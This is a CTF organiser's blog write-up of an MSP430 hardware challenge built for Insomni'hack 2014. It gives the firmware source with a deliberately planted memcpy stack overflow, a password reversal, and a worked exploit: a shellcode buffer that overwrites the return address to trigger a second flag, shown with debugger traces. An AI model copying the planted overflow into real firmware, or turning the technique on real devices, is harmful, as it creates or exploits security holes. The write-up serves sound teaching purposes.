Insomni'hack 14 - Life is even harder
Published on 01 April 2014
As my last hardware challenge has been much appreciated, I decided to prepare a new one for this year. However, I didn't want it to only be a reverse engineering challenge, but also a way for the contestants to discover the wonderful world of hardware hacking using tools like a bus pirate. The project also needed to have two ways to be solved, or two different flags since bonus flags were allowed this year.
Contents
Choosing a CPU
I started by digging into my microcontrollers and dev boards collection, and found the TI MSP430 Launchpad. Since debugging and simulation tools are available for this platform, it would be easy for the contestants to analyze and debug the project. On top of that, the MSP430G2553 has all kind of communication ports and facilities to help develop a nice hardware challenge.
That's how my journey into building this challenge began :
Communication
To introduce people to the world of hardware hacking, all user input would be made using the integrated UART and a bus pirate will be the interface between the contestant's laptop and the launchpad. What a better way to learn how to handle this wonderful piece of tool ?
With a MSP430, the UART input is handled using a software interrupt. The routine is as follow :
#pragma vector=USCIAB0RX_VECTOR
__interrupt void USCI0RX_ISR(void){
buff[i] = UCA0RXBUF; // char gets into buffer
if (buff[i] == '\x0a') { // If a newline is received, proceed
int result = checkpwd(buff); // Check the password
if (result == 0) { // Is password OK ?
moveDisplay(1); // Show the flag
__delay_cycles(2000000); // Wait for some time
moveDisplay(0); // Reset the display
}
i=0; // Reset buffer position
return; // Restart routine
}
i++;
}
Challenges
As I wanted to integrate two challenges on the same device, I needed two different kind of attacks on the device.
Reverse engineering
Of course, the first challenge would be to reverse engineer the firmware. I created a simple routine so the first part of the challenge would be easy enough to get the flag. Basically, the routine copies the buffer into a new one and tries to reset each byte to zero. It then sums up all the bytes and returns the result. Obviously, the result must be equal to zero to validate the password :
//password is 3nTeR
int checkpwd( char * buff)
{
buff[3] -= (10*10);
buff[3]--; // Fourth char must be 101 ('e')
buff[0] ^= 51; // First char must be 0x51 ('3')
buff[1] ^= 110; // Second char must be 110 ('n')
buff[4] -= ((int)buff[2] -2); // Last char must be third char -2 ('R')
buff[2] ^= 84; // Third char must be 84 ('T')
int j=0;
int result = 0;
for (j=0; j<5; j++){
result += (int)buff[j];
}
return result;
}
Memory corruption and exploitation
As the CTF was only 10 hours long, I needed a challenge that required skill of course, but also something that didn't need to long to understand and apply. It would also need very few time to exploit, so the contestants can come and try quickly one after the other.
Since the MSP430 is using a Von Neumann architecture, it is possible to easily implement a common kind of software flaw : the buffer overflow.
For that, I modified the checkpwd() function a bit, and added the (in)famous memcpy() function :
int checkpwd( char * pwd, int len)
{
char buff2[6] = {0};
//password is 3nTeR
memcpy(buff2, pwd, len);
buff2[3] -= (10*10);
buff2[3]--;
buff2[0] ^= 51;
buff2[1] ^= 110;
//buff2[3] ^= 101;
buff2[4] -= ((int)buff2[2] -2);
buff2[2] ^= 84;
//buff2[4] ^= 82;
int j=0;
int result = 0;
for (j=0; j<5; j++){
result += (int)buff2[j];
}
return result;
}
Let's try this with a simple test program :
#include <msp430.h>
#include <stdio.h>
#include <string.h>
int checkpwd( char * pwd, int len)
{
char buff2[6] = {0};
//password is 3nTeR
memcpy(buff2, pwd, len);
buff2[3] -= (10*10);
buff2[3]--;
buff2[0] ^= 51;
buff2[1] ^= 110;
//buff2[3] ^= 101;
buff2[4] -= ((int)buff2[2] -2);
buff2[2] ^= 84;
//buff2[4] ^= 82;
int j=0;
int result = 0;
for (j=0; j<5; j++){
result += (int)buff2[j];
}
return result;
}
int main( void )
{
unsigned char buff[32] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
checkpwd(buff, 32);
return 0;
}
Using mspdebug :
(mspdebug) prog a.out
Erasing...
Programming...
Writing 566 bytes at c000 [section: .text]...
Writing 34 bytes at c236 [section: .rodata]...
Writing 32 bytes at ffe0 [section: .vectors]...
Done, 632 bytes total
(mspdebug) setbr 0x0c138 // address of the checkpwd() RET instruction
Set breakpoint 0
(mspdebug) run
Running. Press Ctrl+C to interrupt...
( PC: 0c138) ( R4: 04141) ( R8: 00000) (R12: 003f2)
( SP: 003de) ( R5: 05aff) ( R9: 00000) (R13: 00000)
( SR: 00000) ( R6: 00000) (R10: 00000) (R14: 00041)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 00094)
checkpwd+0xc2:
0c138: 30 41 RET
memcpy:
0c13a: 0b 12 PUSH R11
0c13c: 0a 12 PUSH R10
0c13e: 09 12 PUSH R9
0c140: 08 12 PUSH R8
0c142: 07 12 PUSH R7
0c144: 0d 93 TST R13
0c146: 70 24 JZ 0xc228
(mspdebug) st
( PC: 04141) ( R4: 04141) ( R8: 00000) (R12: 003f2) <== THERE IT IS !
( SP: 003e0) ( R5: 05aff) ( R9: 00000) (R13: 00000)
( SR: 00000) ( R6: 00000) (R10: 00000) (R14: 00041)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 00094)
__wdt_clear_value+0x3f41:
04141: ff ff ff ff AND.B @R15+, 0xffff(R15)
04145: ff ff ff ff AND.B @R15+, 0xffff(R15)
04149: ff ff ff ff AND.B @R15+, 0xffff(R15)
0414d: ff ff ff ff AND.B @R15+, 0xffff(R15)
It works ! PC (the Program Counter) has been overwritten by our string (0x41 stands for "A"). It is then possible to create a basic buffer overflow on the device using an overly large buffer as the input password.
Flag display
Having a device with vulns is nice, but I wanted the contestants to actually "see" physically what is going on when they either get the right password or exploit the buffer overflow. Using a LCD display is out of question (the flags would be inside the firmware, and I used a screen last year). So I dug into my junk^Wstuff and took out a 180° servo and an old Ikea clock.
The basic idea is the following : the two flags are hidden behind a mask, which covers half the clock surface and is attached to the servo. If the first flag is to be shown, rotate the mask by 90° clockwise to display it. If you rotate the mask 90° counter-clockwise, the other flag is displayed.
Servo management
The servo uses a PWM signal to operate. Looking at the MSP430G2553 documentation shows that we can use a timer to operate a pin in PWM mode. Using the TA1 timer (since TA0 uses the same pins as the UART), we can get the pins 2.2 and 2.5 to act as PWM outputs :
P2DIR = BIT2 + BIT5; // P2.2 and P2.5 output
P2SEL = BIT2 + BIT5; // P2.2 and P2.5 options select
TA1CCR0 = 23912; // PWM period
TA1CCTL1 = OUTMOD_7; // CCR2 reset/set
TA1CCR1 = 1500; // CCR1 PWM duty cycle
TA1CTL = TASSEL_2 + MC_1 + TACLR; // SMCLK, up mode, clear TAR
We now just need to set correct values on the TA1CCR1 register to get the servo on one side or another. As the challenge needed two kind of solutions, the servo is ser at the medium level at the beginning. That way, it can turn on one way or an other. For that, the moveDisplay() function is used :
void moveDisplay(int value)
{
if(value == 1){
TA1CCR1 = 700; // 90° counter-clockwise
}else if(value == 2){
TA1CCR1 = 3400; // 90° clockwise
}else{
TA1CCR1 = 1400; // Base value
}
}
I chose to include the second position in the code so I was sure that it was solvable without sending weird signals to the servo, which would break it. The task was also not about finding correct values for the servo I was using.
Put together, the firmware code is the following :
#include <msp430.h>
#include <stdio.h>
#include <string.h>
char buff[64] = {0};
int i = 0;
int checkpwd( char * pwd, int len)
{
char buff2[6] = {0};
memcpy(buff2, pwd, len);
buff2[3] -= (10*10);
buff2[3]--;
buff2[0] ^= 51;
buff2[1] ^= 110;
buff2[4] -= ((int)buff2[2] -2);
buff2[2] ^= 84;
int j=0;
int result = 0;
for (j=0; j<5; j++){
result += (int)buff2[j];
}
return result;
}
void moveDisplay(int value)
{
if(value == 1){
TA1CCR1 = 700;
}else if(value == 2){
TA1CCR1 = 3400;
}else{
TA1CCR1 = 1400;
}
}
int main( void )
{
WDTCTL = WDTPW + WDTHOLD; // Kill WDT
BCSCTL1 = CALBC1_1MHZ;
DCOCTL = CALDCO_1MHZ;
P1DIR = 0xFF; // All P1.x outputs
P1OUT = 0; // All P1.x reset
P2DIR = 0xFF; // All P2.x outputs
P2OUT = 0; // All P2.x reset
P1SEL = BIT1 + BIT2; // P1.1 = RXD, P1.2=TXD
P1SEL2 = BIT1 + BIT2; // P1.1 = RXD, P1.2=TXD
P2DIR = BIT2 + BIT5; // P2.2 and P2.5 output
P2SEL = BIT2 + BIT5; // P2.2 and P2.5 options select
TA1CCR0 = 23912; // PWM period
TA1CCTL1 = OUTMOD_7; // CCR2 reset/set
TA1CCR1 = 1500; //CCR1 PWM duty cycle
TA1CTL = TASSEL_2 + MC_1 + TACLR; // SMCLK, up mode, clear TAR
UCA0CTL1 |= UCSWRST;
UCA0CTL1 |= UCSSEL_2; // CLK = ACLK
UCA0BR0 = 104; // 32kHz/9600 = 3.41
UCA0BR1 = 0x00;
UCA0MCTL = UCBRS0; //Modulation UCBRSx = 3
UCA0CTL1 &= ~UCSWRST; //**Initialize USCI state machine**
IE2 |= UCA0RXIE; // Enable USCI_A0 RX interrupt
__bis_SR_register(GIE); // Enter LPM1, interrupts enabled
while(1) {}
return 0;
}
#pragma vector=USCIAB0RX_VECTOR
__interrupt void USCI0RX_ISR(void){
buff[i] = UCA0RXBUF;
if (buff[i] == '\x0a') {
int result = checkpwd(buff, i);
if (result == 0) {
moveDisplay(1);
__delay_cycles(2000000);
moveDisplay(0);
}
i=0;
return;
}
i++;
}
Solving the challenge
During the CTF, the contestants were given the following binary file, and were able to come to the admins desk to see the device.
Reverse engineering
As the binary was not striped, it is easy to disassemble the checkpwd() function :
(mspdebug) dis checkpwd 200
checkpwd:
0c076: 04 12 PUSH R4
0c078: 04 41 MOV SP, R4
0c07a: 24 53 INCD R4
0c07c: 31 50 f2 ff ADD #0xfff2, SP
0c080: 84 4f fa ff MOV R15, 0xfffa(R4)
0c084: 84 4e fc ff MOV R14, 0xfffc(R4)
0c088: 0f 44 MOV R4, R15
0c08a: 3f 50 f4 ff ADD #0xfff4, R15
0c08e: 8f 43 00 00 CLR 0x0000(R15)
0c092: 2f 53 INCD R15
0c094: 8f 43 00 00 CLR 0x0000(R15)
0c098: 2f 53 INCD R15
0c09a: 8f 43 00 00 CLR 0x0000(R15)
0c09e: 2f 53 INCD R15
0c0a0: 1d 44 fc ff MOV 0xfffc(R4), R13
0c0a4: 0f 44 MOV R4, R15
0c0a6: 3f 50 f4 ff ADD #0xfff4, R15
0c0aa: 1e 44 fa ff MOV 0xfffa(R4), R14
0c0ae: b0 12 3a c1 CALL #memcpy // Copy buffer into buffer @0xfff4
0c0b2: 5f 44 f7 ff MOV.B 0xfff7(R4), R15
0c0b6: 7f 50 9c ff ADD.B #0x009c, R15 // buff[3] += 0x9c
0c0ba: c4 4f f7 ff MOV.B R15, 0xfff7(R4)
0c0be: 5f 44 f7 ff MOV.B 0xfff7(R4), R15
0c0c2: 7f 53 ADD.B #0x00ff, R15 // buff[3] += 0xff (signed operation)
0c0c4: c4 4f f7 ff MOV.B R15, 0xfff7(R4)
0c0c8: 5f 44 f4 ff MOV.B 0xfff4(R4), R15
0c0cc: 7f e0 33 00 XOR.B #0x0033, R15 // buff[0] ^= 0x33
0c0d0: c4 4f f4 ff MOV.B R15, 0xfff4(R4)
0c0d4: 5f 44 f5 ff MOV.B 0xfff5(R4), R15
0c0d8: 7f e0 6e 00 XOR.B #0x006e, R15 // buff[1] ^= 0x6e
0c0dc: c4 4f f5 ff MOV.B R15, 0xfff5(R4)
0c0e0: 5f 44 f8 ff MOV.B 0xfff8(R4), R15
0c0e4: 4e 4f MOV.B R15, R14
0c0e6: 5f 44 f6 ff MOV.B 0xfff6(R4), R15
0c0ea: 4d 4e MOV.B R14, R13
0c0ec: 4d 8f SUB.B R15, R13 // buff[4] -= buff[2]
0c0ee: 4f 4d MOV.B R13, R15
0c0f0: 6f 53 INCD.B R15 // buff[4] += 2
0c0f2: c4 4f f8 ff MOV.B R15, 0xfff8(R4)
0c0f6: 5f 44 f6 ff MOV.B 0xfff6(R4), R15
0c0fa: 7f e0 54 00 XOR.B #0x0054, R15 // buff[2] ^= 0x54
0c0fe: c4 4f f6 ff MOV.B R15, 0xfff6(R4)
0c102: 84 43 f0 ff CLR 0xfff0(R4)
0c106: 84 43 f2 ff CLR 0xfff2(R4)
0c10a: 84 43 f0 ff CLR 0xfff0(R4)
0c10e: 0b 3c JMP 0xc126
0c110: 0f 44 MOV R4, R15
0c112: 3f 50 f4 ff ADD #0xfff4, R15
0c116: 1f 54 f0 ff ADD 0xfff0(R4), R15
0c11a: 6f 4f MOV.B @R15, R15 // buff[i]
0c11c: 8f 11 SXT R15
0c11e: 84 5f f2 ff ADD R15, 0xfff2(R4) // result = buff[i]
0c122: 94 53 f0 ff INC 0xfff0(R4) // i++
0c126: b4 90 05 00 f0 ff CMP #0x0005, 0xfff0(R4) // i<5 ?
0c12c: f1 3b JL 0xc110 // loop
0c12e: 1f 44 f2 ff MOV 0xfff2(R4), R15
0c132: 31 50 0e 00 ADD #0x000e, SP
0c136: 34 41 POP R4
0c138: 30 41 RET
As we can see, the values of the buffer can be calculated, and give the ASCII '3nTeR'. Try to send this with a newline over the UART will give you the code :
Buffer overflow exploitation
Using MSPdebug, it is easy to find the USCI0RX_ISR function. The problem is, how to get in there, since the simulator does not handle UART ports and the interrupt routine ? Well, it's a debugger, so after running the beginning of the code, let's just break the execution flow and set the PC to the address of the function :
(mspdebug) prog firmware
Erasing...
Programming...
Writing 856 bytes at c000 [section: .text]...
Writing 2 bytes at c358 [section: .data]...
Writing 32 bytes at ffe0 [section: .vectors]...
Done, 890 bytes total
(mspdebug) run
Running. Press Ctrl+C to interrupt...
^C <== Ctrl+C here
( PC: 0c0d4) ( R4: 00402) ( R8: 00000) (R12: 00000)
( SP: 00400) ( R5: 05aff) ( R9: 00000) (R13: 00000)
( SR: 0000d) ( R6: 00000) (R10: 00000) (R14: 00000)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 00001)
main+0x96:
0c0d4: ff 3f JMP 0xc0d4
0c0d6: 32 d0 f0 00 BIS #0x00f0, SR
0c0da: fd 3f JMP 0xc0d6
0c0dc: 30 40 56 c3 BR #0xc356
checkpwd:
0c0e0: 04 12 PUSH R4
0c0e2: 04 41 MOV SP, R4
(mspdebug) set PC USCI0RX_ISR
( PC: 0c1d8) ( R4: 00402) ( R8: 00000) (R12: 00000)
( SP: 00400) ( R5: 05aff) ( R9: 00000) (R13: 00000)
( SR: 0000d) ( R6: 00000) (R10: 00000) (R14: 00000)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 00001)
(mspdebug)
We are ready to prepare our code, now step to the instruction at address 0x0c1fe, where the comparison with the newline is done
(mspdebug) setbr 0x0c1fe
(mspdebug) run
( PC: 0c1fe) ( R4: 00400) ( R8: 00000) (R12: 00000)
( SP: 003f4) ( R5: 05aff) ( R9: 00000) (R13: 00000)
( SR: 00009) ( R6: 00000) (R10: 00000) (R14: 000ff)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 000ff)
USCI0RX_ISR+0x26:
0c1fe: 7f 90 0a 00 CMP.B #0x000a, R15
0c202: 20 20 JNZ 0xc244
0c204: 1f 42 42 02 MOV &i, R15
0c208: 0e 4f MOV R15, R14
0c20a: 3f 40 02 02 MOV #buff, R15
Now, set the value of the buffer to a large one, set i and R15 accordingly :
(mspdebug) mw buff 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 0a
(mspdebug) mw i 0x10
(mspdebug) set R15 0x0a
Now if you set a breakpoint at address 0x0c1a2 (the RET instruction at the end of the checkpwd() function and run, you will break just before the overflow :
(mspdebug) setbr 0x0c1a2
(mspdebug) run
Running. Press Ctrl+C to interrupt...
( PC: 0c1a2) ( R4: 04c4b) ( R8: 00000) (R12: 003e6)
( SP: 003f2) ( R5: 05a88) ( R9: 00000) (R13: 00002)
( SR: 00008) ( R6: 00000) (R10: 00000) (R14: 00045)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 00098)
checkpwd+0xc2:
0c1a2: 30 41 RET
moveDisplay:
0c1a4: 04 12 PUSH R4
0c1a6: 04 41 MOV SP, R4
0c1a8: 24 53 INCD R4
0c1aa: 21 83 DECD SP
0c1ac: 84 4f fc ff MOV R15, 0xfffc(R4)
0c1b0: 94 93
Let's move a step forward...
(mspdebug) st
( PC: 04e4d) ( R4: 04c4b) ( R8: 00000) (R12: 003e6)
( SP: 003f4) ( R5: 05a88) ( R9: 00000) (R13: 00002)
( SR: 00008) ( R6: 00000) (R10: 00000) (R14: 00045)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 00098)
__wdt_clear_value+0x4c07:
04e4d: ff ff ff ff AND.B @R15+, 0xffff(R15)
04e51: ff ff ff ff AND.B @R15+, 0xffff(R15)
04e55: ff ff ff ff AND.B @R15+, 0xffff(R15)
04e59: ff ff ff ff AND.B @R15+, 0xffff(R15)
And PC is overwritten with 0x4e4d, at offset 12 of our buffer ! Now, verify the memory position of the buffer :
(mspdebug) md buff
00202: 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 0a |ABCDEFGHIJKLMNO.|
00212: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00222: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00232: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Address 0x0202. We know we can set the buffer value at offset 12 to 0202 so when the RET instruction is executed, the program flow will jump at the beginning of our buffer.
Now, we need to prepare a valid code to be run on the device. Remember, we need to call moveDisplay(2) to get the second flag. As the arguments to functions are passed via registers, we need to set R15 to 2 before calling moveDisplay(). Let's have a look at the USCI0RX_ISR function disassembly to find the opcodes we need :
(mspdebug) dis USCI0RX_ISR 120
USCI0RX_ISR:
0c1d8: 0f 12 PUSH R15
[...]
0c212: 84 4f f4 ff MOV R15, 0xfff4(R4)
0c216: 84 93 f4 ff TST 0xfff4(R4)
0c21a: 11 20 JNZ 0xc23e
0c21c: 1f 43 MOV #0x0001, R15 <== Right here !
0c21e: b0 12 a4 c1 CALL #moveDisplay
0c222: 3f 40 0b 00 MOV #0x000b, R15
0c226: 3e 40 1e 2c MOV #0x2c1e, R14
[...]
Here, we have the moveDisplay(1) call, just replace the 0x1F byte by 0x2F byte to get a MOV #0x0002, R15 and keep the rest. Our buffer should now look like this :
2F 43 B0 12 A4 C1 00 00 00 00 00 00 02 02 00 0A
Now, let's do the same as before in MSPdebug, with our new buffer, break at the end of the checkpwd() function and step :
(mspdebug) st
( PC: 00202) ( R4: 00000) ( R8: 00000) (R12: 003e6)
( SP: 003f4) ( R5: 05a88) ( R9: 00000) (R13: 000f4)
( SR: 00008) ( R6: 00000) (R10: 00000) (R14: 000a4)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 0ffd0)
buff:
00202: 2f 43 MOV #0x0002, R15
00204: b0 12 a4 c1 CALL #moveDisplay
00208: 00 00 BRA @PC
0020a: 00 00 BRA @PC
0020c: 00 00 BRA @PC
0020e: 02 02 MOVA #0x0004, SR
00210: 00 0a BRA @R10
Seems OK, right ? The problem is that if you run the code from that point, you'll get an error :
(mspdebug) run
Running. Press Ctrl+C to interrupt...
sim: unknown single-operand opcode: 0x0000 (PC = 0x0208)
Woops ! the program just crashed. The same will happen on the Launchpad, preventing it from working properly. The watchdog will activate and reset the CPU, so our flag won't be shown.
To be sure that the program won't crash, we need to add an infinite loop to our program. The byte sequence FF 3F is basically a JMP self instruction, perfect for our needs. Now repeat the procedure with the new buffer value :
2F 43 B0 12 A4 C1 FF 3F 00 00 00 00 02 02 00 0A
Result is far better :
(mspdebug) st
( PC: 00202) ( R4: 00000) ( R8: 00000) (R12: 003e6)
( SP: 003f4) ( R5: 05a88) ( R9: 00000) (R13: 000f4)
( SR: 00008) ( R6: 00000) (R10: 00000) (R14: 000a4)
( R3: 00000) ( R7: 00000) (R11: 00000) (R15: 0ffd0)
buff:
00202: 2f 43 MOV #0x0002, R15
00204: b0 12 a4 c1 CALL #moveDisplay
00208: ff 3f JMP 0x0208
0020a: 00 00 BRA @PC
0020c: 00 00 BRA @PC
0020e: 02 02 MOVA #0x0004, SR
00210: 00 0a BRA @R10
(mspdebug) run
Running. Press Ctrl+C to interrupt...
If we try this on the device, we get our flag :
Conclusions
The challenge ran fine during the Insomni'hack CTF. Altogether, only two teams managed to get both flags from the device, each with a different approach and a slightly different solution. Congrats to them !
This year, I spent less time on the hardware part, but the challenge was funnier for the contestants, as it involved two different paths to follow to get all the points.
This article also covers the way to get the flags with some knowledge about the code underneath. To see how the teams got the solution, you can read this excellent writeup from the Dragon Sector team, first to solve it.